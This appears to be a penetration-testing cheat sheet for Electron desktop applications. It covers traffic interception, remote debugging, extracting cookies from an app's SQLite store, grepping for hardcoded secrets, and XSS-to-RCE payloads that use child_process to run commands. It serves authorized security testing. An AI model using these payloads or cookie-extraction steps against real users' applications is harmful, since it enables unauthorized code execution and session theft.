Electron / Atom Shell

Electron (formerly known as Atom Shell) is a software framework developed and maintained by GitHub for building desktop applications using JavaScript, HTML, and CSS. By embedding Chromium (browser engine) and Node.js (backend) into its binary, Electron allows to maintain one JavaScript codebase and create cross-platform apps that work on Windows, macOS, and Linux without native development. Additionally, it also uses various APIs to allow things such as native integration with Node services, and an Inter-process communication module.

Official Documentation
Electron (software framework) (Wikipedia)
Process Model
An Intro To Electron Application Penetration Testing
XSS to RCE Electron Desktop Apps (HackTricks)

Intercept HTTP requests

You need to add Burp’s certificate to the Windows Trust Store or to Mac OS’ Keychain. See Burp Suite.

Start Burp Suite to intercept requests.

Windows – Start the application using a proxy

ElectronApp.exe --proxy-server=127.0.0.1:8080

Mac OS – Start the application using a proxy

cd ElectronApp.app/Contents/MacOS
./ElectronApp --proxy-server=127.0.0.1:8080

Debugging with Chrome’s DevTools

Debugging the Main Process

ElectronApp.exe --remote-debugging-port=54321

Start Chrome and go to chrome://inspect
Under Devices, click Discover network targets -> Configure
Add localhost:54321 (no need to select Enable port forwarding) and click Done
Under Remote Targets, the application should appear
Click on Inspect

Find Electron version

In the DevTools, go to the Console tab. Check the Security Advisories that apply to the version.

navigator.userAgent

navigator.userAgent.match(/Electron\/([\d\.]+\d+)/)[1]

Cookies

Since Electron applications use Chromium, cookies are stored in:

Windows

C:\Users\<username>\AppData\Roaming\<app name>\Network\Cookies

Mac OS

/Users/<username>/Library/Application Support/<app name>/Cookies

Show cookies

This is a SQLite file. Transfer the file to Kali and extract the cookies.

sqlite3 Cookies "select name || ' = ' || value from cookies"

Show stack trace for warnings

ElectronApp.exe --trace-warnings

Sensitive Information

Look for hardcoded passwords or keys

grep -Ri "pass" ./

grep -Ri "key" ./

Known vulnerabilities

Identify known vulnerabilities in the project’s dependencies

npm i --package-lock-only

npm audit

XSS

XSS to RCE

Windows payloads

<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
<img src=x onerror=alert(require('child_process').exec('calc')); />

Linux & Mac OS payloads

<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());"> 
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">